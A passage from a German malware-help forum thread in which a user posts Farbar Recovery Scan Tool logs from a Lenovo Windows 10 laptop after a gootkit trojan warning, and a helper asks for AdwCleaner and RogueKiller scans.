2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\es-MX
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\appraiser
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-11-18 09:16 - 2017-02-26 14:44 - 133736600 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2020-11-18 09:16 - 2017-02-26 14:44 - 000000000 ____D C:\WINDOWS\system32\MRT
2020-11-14 18:17 - 2017-02-25 16:38 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-11-14 16:43 - 2019-10-27 13:53 - 000003356 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2235809649-4173297830-2174137979-1001
2020-11-14 16:43 - 2019-10-27 13:46 - 000002390 _____ C:\Users\seife\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-14 16:42 - 2020-09-24 08:23 - 000003700 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-11-14 16:42 - 2020-09-24 08:23 - 000003576 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-11-12 11:00 - 2020-10-17 10:36 - 000907064 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-11-12 10:59 - 2020-10-17 10:36 - 000436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
2020-11-14 17:28 - 2020-11-27 17:29 - 000055296 _____ () C:\Users\seife\AppData\Roaming\cookies.sqlite
==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
==================== Ende von FRST.txt ========================
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 28-11-2020
durchgeführt von seife (28-11-2020 14:58:04)
Gestartet von C:\Users\seife\Desktop
Windows 10 Home Version 1909 18363.1198 (X64) (2019-10-27 12:53:40)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-2235809649-4173297830-2174137979-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2235809649-4173297830-2174137979-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-2235809649-4173297830-2174137979-1000 - Limited - Disabled) => C:\Users\defaultuser0
Gast (S-1-5-21-2235809649-4173297830-2174137979-501 - Limited - Disabled)
seife (S-1-5-21-2235809649-4173297830-2174137979-1001 - Administrator - Enabled) => C:\Users\seife
WDAGUtilityAccount (S-1-5-21-2235809649-4173297830-2174137979-504 - Limited - Disabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20066 - Adobe Systems Incorporated)
Adobe Flash Player 29 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 29.0.0.113 - Adobe Systems Incorporated)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 382.64 - NVIDIA Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.72 - Piriform)
Connect (HKLM-x32\...\MAGIX_connector_is1) (Version: 2.5.1.84 - MAGIX Software GmbH)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Digital Video Repair 3.5.0.2 (HKLM-x32\...\Digital VideoRepair_is1) (Version: 3.5.0.2 - Rising Research)
Dolby Audio X2 Windows API SDK (HKLM\...\{82C288CC-A96D-43E3-9119-944DABF5DD61}) (Version: 0.8.0.74 - Dolby Laboratories, Inc.)
Dolby Audio X2 Windows APP (HKLM\...\{9207D68E-666A-49C7-A900-9F5B2FF289E4}) (Version: 0.8.0.71 - Dolby Laboratories, Inc.)
Fotogalerie (HKLM-x32\...\{41BF4A3B-D60A-4E92-883F-C88C8C157261}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.1.0.309 - )
honestech VHS to DVD 2.0 SE (HKLM-x32\...\{2856F5EA-E98A-40E4-BAD6-8C644A4A3F3C}) (Version: 2.0 - honestech)
Intel(R) Wireless Bluetooth(R) (HKLM-x32\...\{278F5FF6-100E-4089-924F-80BDB7F81B4E}) (Version: 19.10.1635.0483 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{bb0592a7-5772-4736-9d55-2402740085db}) (Version: 10.1.1.38 - Intel(R) Corporation) Hidden
Intel® PROSet/Wireless Software (HKLM-x32\...\{66614300-cd9b-4a62-8b18-c97e9562dc3e}) (Version: 19.50.0 - Intel Corporation)
Lenovo App Explorer (HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Host App Service) (Version: 0.273.3.730 - SweetLabs for Lenovo) <==== ACHTUNG
Lenovo OneKey Recovery (HKLM\...\{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.4706 - CyberLink Corp.) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.4706 - CyberLink Corp.)
Lenovo Vantage Service (HKLM-x32\...\VantageSRV_is1) (Version: 3.3.115.0 - Lenovo Group Ltd.)
Malwarebytes version 4.2.3.96 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.2.3.96 - Malwarebytes)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.47 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.137.99 - )
Microsoft OneDrive (HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\OneDriveSetup.exe) (Version: 20.169.0823.0008 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{0BCA8FBE-0C1C-4C65-98A3-5D34AAF41737}) (Version: 2.70.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{70C91B91-61E8-4D06-86D6-A9DCC291983A}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 83.0 (x64 de) (HKLM\...\Mozilla Firefox 83.0 (x64 de)) (Version: 83.0 - Mozilla)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
NVIDIA 3D Vision Treiber 382.64 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 382.64 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Grafiktreiber 382.64 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 382.64 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden
UpdateAssistant (HKLM\...\{F49D6A65-1AB6-4728-9FDA-DB5BAB631CF6}) (Version: 1.23.0.0 - Microsoft Corporation) Hidden
USB2.0 Grabber (HKLM-x32\...\{45518B6D-9DDF-4144-83E4-A56762524F35}) (Version: 7.12.000.003 - Youyan)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Vulkan Run Time Libraries 1.0.33.0 (HKLM\...\VulkanRT1.0.33.0) (Version: 1.0.33.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.0 (HKLM\...\VulkanRT1.0.42.0) (Version: 1.0.42.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0-2) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1-2) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
WhatsApp (HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\WhatsApp) (Version: 0.2.5863 - WhatsApp)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - )
Packages:
=========
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-09-25] (Microsoft Corporation)
Lenovo Kontoportal -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoID_2.0.37.0_x86__4642shxvsv8s2 [2017-04-24] (LENOVO INCORPORATED.)
Lenovo Settings -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoSettings_3.177.0.0_x86__4642shxvsv8s2 [2017-12-30] (LENOVO INCORPORATED.)
Lenovo Vantage -> C:\Program Files\WindowsApps\E046963F.LenovoCompanion_10.2009.18.0_x64__k1h2ywk1493x8 [2020-10-17] (LENOVO INC.)
Mahjong Epic -> C:\Program Files\WindowsApps\KristanixStudiosAS.MahjongEpic_1.1.5.0_x64__nafbvgh473e28 [2018-10-19] (Kristanix Studios AS)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-28] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-28] (Microsoft Corporation) [MS Ad]
Microsoft Minesweeper -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMinesweeper_3.1.9160.0_x86__8wekyb3d8bbwe [2020-11-26] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.10142.0_x64__8wekyb3d8bbwe [2020-11-26] (Microsoft Studios) [MS Ad]
MPEG-2-Videoerweiterung -> C:\Program Files\WindowsApps\Microsoft.MPEG2VideoExtension_1.0.22661.0_x64__8wekyb3d8bbwe [2019-09-26] (Microsoft Corporation)
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.97.752.0_x64__mcm4njqhnhss8 [2020-09-17] (Netflix, Inc.)
SHARE.it -> C:\Program Files\WindowsApps\30608Paradox.SHAREit81_1.7.18.0_x64__ghshvk1r7eapp [2018-02-28] (SHAREit Technologies Co.Ltd) [MS Ad]
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-11-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxDTCM.dll [2018-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-06-19] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-11-26] (Malwarebytes Corporation -> Malwarebytes)
==================== Codecs (Nicht auf der Ausnahmeliste) ====================
==================== Verknüpfungen & WMI ========================
==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
2020-11-22 11:34 - 2020-11-22 11:34 - 000365056 _____ () [Datei ist nicht signiert] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxHef9fb4ae#\6ed3bb811d84cfae5c88e4f7497f70de\Interop.CxHDAudioAPILib.ni.dll
2020-11-22 11:34 - 2020-11-22 11:34 - 000018944 _____ () [Datei ist nicht signiert] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxUtilSvcLib\9a05a4dd1206a0a6138ee46017bef537\Interop.CxUtilSvcLib.ni.dll
2019-10-27 13:59 - 2016-07-14 09:58 - 001155072 _____ (Conexant Systems, Inc.) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\Conexant\SAII\CxHDAudioAPI.dll
2019-10-27 13:43 - 2017-06-19 02:51 - 000339072 _____ (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Datei ist nicht signiert] C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem\_nvstapisvr64.dll
2020-09-17 09:30 - 2020-05-30 19:04 - 001638912 _____ (Robert Simpson, et al.) [Datei ist nicht signiert] C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\x64\SQLite.Interop.dll
2020-11-14 16:48 - 2020-05-30 19:58 - 001280000 _____ (Robert Simpson, et al.) [Datei ist nicht signiert] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\SQLite.Interop.dll
2020-07-02 19:26 - 2020-04-09 08:17 - 000944840 _____ (SQLite Development Team) [Datei ist nicht signiert] C:\ProgramData\Lenovo\iMController\Plugins\LenovoWiFiSecurityPlugin\x86\x86\e_sqlite3.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
IE trusted site: HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts Inhalt: =========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2018-04-12 00:38 - 2020-11-28 14:37 - 000000027 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost
==================== Andere Bereiche ===========================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Desktop-Hintergrund.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Wiederherstellungspunkte =========================
==================== Fehlerhafte Geräte im Gerätemanager ============
==================== Fehlereinträge in der Ereignisanzeige: ========================
Applikationsfehler:
==================
Error: (11/28/2020 02:48:49 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (5528,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 02:36:39 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (11004,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 02:06:31 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (11556,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 01:42:15 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (1052,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 01:28:30 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (13756,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 01:21:38 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (6284,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 12:38:19 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (9696,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/27/2020 05:43:34 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (1080,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Systemfehler:
=============
Error: (11/28/2020 02:38:39 PM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "Conexant SmartAudio service" hat einen ungültigen aktuellen Status gemeldet: 14
Error: (11/28/2020 02:38:15 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.
Modulpfad: C:\WINDOWS\system32\IntelWifiIhv04.dll
Error: (11/28/2020 02:38:15 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.
Modulpfad: C:\WINDOWS\system32\IntelWifiIhv04.dll
Error: (11/28/2020 02:38:09 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.
Modulpfad: C:\WINDOWS\system32\IntelWifiIhv04.dll
Error: (11/28/2020 02:38:09 PM) (Source: DCOM) (EventID: 10010) (User: HSE)
Description: Der Server "Microsoft.ZuneVideo_10.20092.14511.0_x64__8wekyb3d8bbwe!Microsoft.ZuneVideo" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (11/28/2020 02:38:09 PM) (Source: DCOM) (EventID: 10010) (User: HSE)
Description: Der Server "{B9B05098-3E30-483F-87F7-027CA78DA287}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (11/28/2020 02:38:09 PM) (Source: DCOM) (EventID: 10010) (User: HSE)
Description: Der Server "{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (11/28/2020 02:37:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "CCSDK" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Windows Defender:
===================================
Date: 2020-11-28 13:00:56.118
Description:
Bei Windows Defender Antivirus ist ein Fehler beim Laden der Sicherheitsinformationen aufgetreten. Es wird versucht, zu einer als fehlerfrei bekannten Version zurückzukehren.
Sicherheitsversion versucht: Aktuell
Fehlercode: 0x80070003
Fehlerbeschreibung: Das System kann den angegebenen Pfad nicht finden.
tSicherheitsversion: 0.0.0.0;0.0.0.0
Modulversion: 0.0.0.0
CodeIntegrity:
===================================
Date: 2020-11-28 12:28:54.622
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-11-26 17:37:11.047
Description:
Windows blocked file \Device\HarddiskVolume3\Windows\System32\scrobj.dll which has been disallowed for protected processes.
Date: 2020-11-26 17:36:49.624
Description:
Windows blocked file \Device\HarddiskVolume3\Windows\System32\scrobj.dll which has been disallowed for protected processes.
Date: 2020-10-17 11:07:43.024
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-17 11:01:14.880
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-24 09:35:06.103
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-17 10:40:12.400
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-17 10:35:48.073
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Speicherinformationen ===========================
BIOS: LENOVO 3JCN23WW 11/10/2016
Hauptplatine: LENOVO Torronto 5C2
Prozessor: Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
Prozentuale Nutzung des RAM: 58%
Installierter physikalischer RAM: 8092.13 MB
Verfügbarer physikalischer RAM: 3351.74 MB
Summe virtueller Speicher: 9372.13 MB
Verfügbarer virtueller Speicher: 4826.9 MB
==================== Laufwerke ================================
Drive c: (Windows) (Fixed) (Total:101.53 GB) (Free:33.42 GB) NTFS
Drive d: (LENOVO) (Fixed) (Total:931.39 GB) (Free:608.74 GB) NTFS
\\?\Volume{069618c6-dd07-46f2-86fd-8d35a861ec2f}\ (WINRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.49 GB) NTFS
\\?\Volume{13c38bb5-d19e-4e0f-91f2-90d4dec07ba0}\ (LENOVO_PART) (Fixed) (Total:15.48 GB) (Free:2.16 GB) NTFS
\\?\Volume{9e8eda84-9911-4276-af29-84df3c9d329b}\ (SYSTEM_DRV) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32
==================== MBR & Partitionstabelle ====================
==========================================================
Disk: 0 (Size: 119.2 GB) (Disk ID: DF497120)
Partition: GPT.
==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 868CFB6E)
Partition: GPT.
==================== Ende von Addition.txt =======================
|
|
28.11.2020, 16:02
| #5 |
| /// TB-Ausbilder | Windows 10. Information von meinem Provider zu gootkit Trojaner Schritt 1
Schritt 2 Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Schritt 3 Führe RogueKiller Anti-Malware gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Bitte poste mit deiner nächsten Antwort:
|
|
28.11.2020, 16:25
| #6 |
| | Windows 10. Information von meinem Provider zu gootkit Trojaner Die Logdatei des FRST-Fix (fixlog.txt): Code:
